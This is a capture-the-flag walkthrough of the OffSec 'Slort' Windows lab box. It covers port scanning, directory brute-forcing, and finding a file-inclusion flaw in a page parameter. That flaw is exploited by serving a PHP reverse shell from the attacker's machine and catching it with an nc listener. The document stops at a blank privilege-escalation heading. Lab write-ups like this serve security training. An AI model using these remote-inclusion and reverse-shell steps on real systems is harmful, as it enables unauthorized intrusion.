
Slort Walkthrough

Platform: Offsec | PG Practice
Difficulty: Intermediate
OS: Windows
Author: Pawan Kumar (Vulntricks)


1. Scanning

└─$ rustscan -a $IP -- -sV -sC -Pn

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
3306/tcp open mysql syn-ack ttl 125 MariaDB 10.3.24 or later (unauthorized)
4443/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.224.53:4443/dashboard/
5040/tcp open unknown syn-ack ttl 125
7680/tcp open pando-pub? syn-ack ttl 125
8080/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.224.53:8080/dashboard/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-open-proxy: Proxy might be redirecting requests
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 47958/tcp): CLEAN (Couldn't connect)
| Check 2 (port 43822/tcp): CLEAN (Couldn't connect)
| Check 3 (port 22925/udp): CLEAN (Timeout)
| Check 4 (port 13188/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: 0s
| smb2-time:
| date: 2025-09-02T12:11:10
|_ start_date: N/A

2. Enumeration

Enumerating FTP port 21

Starting with anonymous and admin logins --> both failed.

The banner gives us the version, FileZilla ftpd 0.9.41 beta. Searchsploit shows nothing directly exploitable for it, so we can come back to this later.

Enumerating HTTP

Port 4443 Enumeration

We'll enumerate the web apps first, since they generally offer the best chances of finding vulnerabilities.

At first glance it redirects to the default XAMPP Apache dashboard page.

The phpMyAdmin page can't be accessed.

While looking through the phpinfo page, we found a user named rupert.

Using Gobuster we found a site.

Port 8080 Enumeration

It serves the same page as 4443, which is odd.

After digging a little with Gobuster we found a site:

└─$ gobuster dir --url $URL --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x txt,pdf,conf 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.224.53:8080
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,pdf,conf
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 345] [--> http://192.168.224.53:8080/img/]
/site (Status: 301) [Size: 346] [--> http://192.168.224.53:8080/site/]
/examples (Status: 503) [Size: 1060]
/licenses (Status: 403) [Size: 1205]
/dashboard (Status: 301) [Size: 351] [--> http://192.168.224.53:8080/dashboard/]
/%20 (Status: 403) [Size: 1046]
/IMG (Status: 301) [Size: 345] [--> http://192.168.224.53:8080/IMG/]
/Site (Status: 301) [Size: 346] [--> http://192.168.224.53:8080/Site/]


Both ports turn out to host the same site, just served twice (the /IMG and /Site hits are the same directories as /img and /site, since the Windows filesystem is case-insensitive). Looking at http://192.168.224.53:4443/site/index.php?page=main.php, the page parameter includes a file by name, so we can test for a file inclusion vulnerability.

On initial testing I quickly found LFI.

Let's test for RFI as well. We'll copy the shell with cp /usr/share/webshells/php/php-reverse-shell.php . , host it on the Kali machine and try to include it through the website.

Change the required parameters, IP and port, in the script.

Hosting it on the Kali machine

└─$ sudo python3 -m http.server 80

Opening a listener on the Kali machine

nc -nvlp 21


Successfully failed 😅, so we'll try a different reverse shell. The pentestmonkey shell is written for Linux (it spawns /bin/sh -i), which is why it does not work on this Windows host.


Initial access

After a few more failures I found that Ivan Sincek's php_reverse_shell.php worked; unlike the pentestmonkey shell it detects the OS and uses cmd.exe on Windows.

Called from the site, included through the page parameter:

https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php


Privilege Escalation